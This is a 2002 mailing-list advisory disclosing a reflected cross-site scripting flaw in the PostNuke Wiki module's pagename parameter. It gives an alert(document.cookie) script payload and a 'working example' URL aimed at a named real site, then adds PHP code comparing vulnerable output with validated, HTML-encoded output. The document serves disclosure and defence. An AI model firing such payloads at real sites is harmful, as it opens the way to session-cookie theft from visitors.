Wiki module postnuke Cross Site Scripting Vulnerability

From: Pistone (jorgepat_private)
Date: Tue Jul 16 2002 - 17:49:24 PDT


    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    - ----------------------------------------------------
    Class :         Input Validation Error
    
    Risk :            Due to the simplicity of the attack and the number of sites
                       that run phpwiki, the risk is classified as Medium to High.
    - ----------------------------------------------------
    This wiki is running as a PostNuke module. 
    - ------------------------------------
    
    Exploit:         pagename=|script|alert(document.cookie)|/script|
    
    Change | to <>
    
    Working Example :
    
    http://centre.ics.uci.edu/~grape/modules.php?op=modload&name=Wiki&file=index&pagename=|script|alert(document.cookie)|/script|
    
    - --------------------------------------------------------------------------------------------
    The programmer of the wiki module and the admin of postnuke-espanol.org
    receive a copy of this report.
    - --------------------------------------------------------
    
    
    Regards
    
    Pistone
    - - --------
    http://www.gauchohack.com.ar
    http://www.hackindex.org
    
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org
    
    iD8DBQE9NL8cY47Vx76lNPkRAsNDAJ9M5eXRMxL1ASb2TlWaDaveotKAbgCZAQSz
    PlAN98+qigqp8S9pkkfFRm4=
    =c2FT
    -----END PGP SIGNATURE-----
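
For maintainers of the affected module, the defensive pattern for a reflected request parameter such as `pagename`, as an added example that is not part of the original post and is not PHPWiki or PostNuke code: validate the value against an allow-list and HTML-encode it on output. The function names, the allowed character set and the `HomePage` fallback are assumptions, and the code assumes PHP 7 or later.

```php
<?php
// Added example: not PHPWiki or PostNuke code. All function names are hypothetical.

// Vulnerable pattern: the request value is concatenated into HTML unchanged,
// so any markup in pagename is parsed by the visitor's browser.
function render_title_unsafe(string $pagename): string
{
    return '<h1>' . $pagename . '</h1>';
}

// Encode for an HTML text or quoted-attribute context.
function encode_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Assumed policy: 1-64 letters, digits, spaces, '_', '.', '-'.
// Invalid UTF-8 makes preg_match() return false, which is rejected too.
function is_valid_pagename(string $pagename): bool
{
    return preg_match('/\A[\p{L}\p{N} _.\-]{1,64}\z/u', $pagename) === 1;
}

// Hardened pattern: reject unexpected names, then encode on output anyway.
function render_title_safe(string $pagename): string
{
    if (!is_valid_pagename($pagename)) {
        $pagename = 'HomePage'; // assumed fixed fallback page
    }
    return '<h1>' . encode_html($pagename) . '</h1>';
}

// Constructed sample values for the pagename parameter.
$samples = ['RecentChanges', 'Release Notes 1.0', '<b>markup</b>'];
foreach ($samples as $s) {
    printf("input:   %s\n", $s);
    printf("unsafe:  %s\n", render_title_unsafe($s));
    printf("encoded: %s\n", '<h1>' . encode_html($s) . '</h1>');
    printf("safe:    %s\n\n", render_title_safe($s));
}
```

Encoding alone already neutralises the markup; the allow-list additionally keeps unexpected names out of links, logs and storage keys that other code may build from the same value.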
    


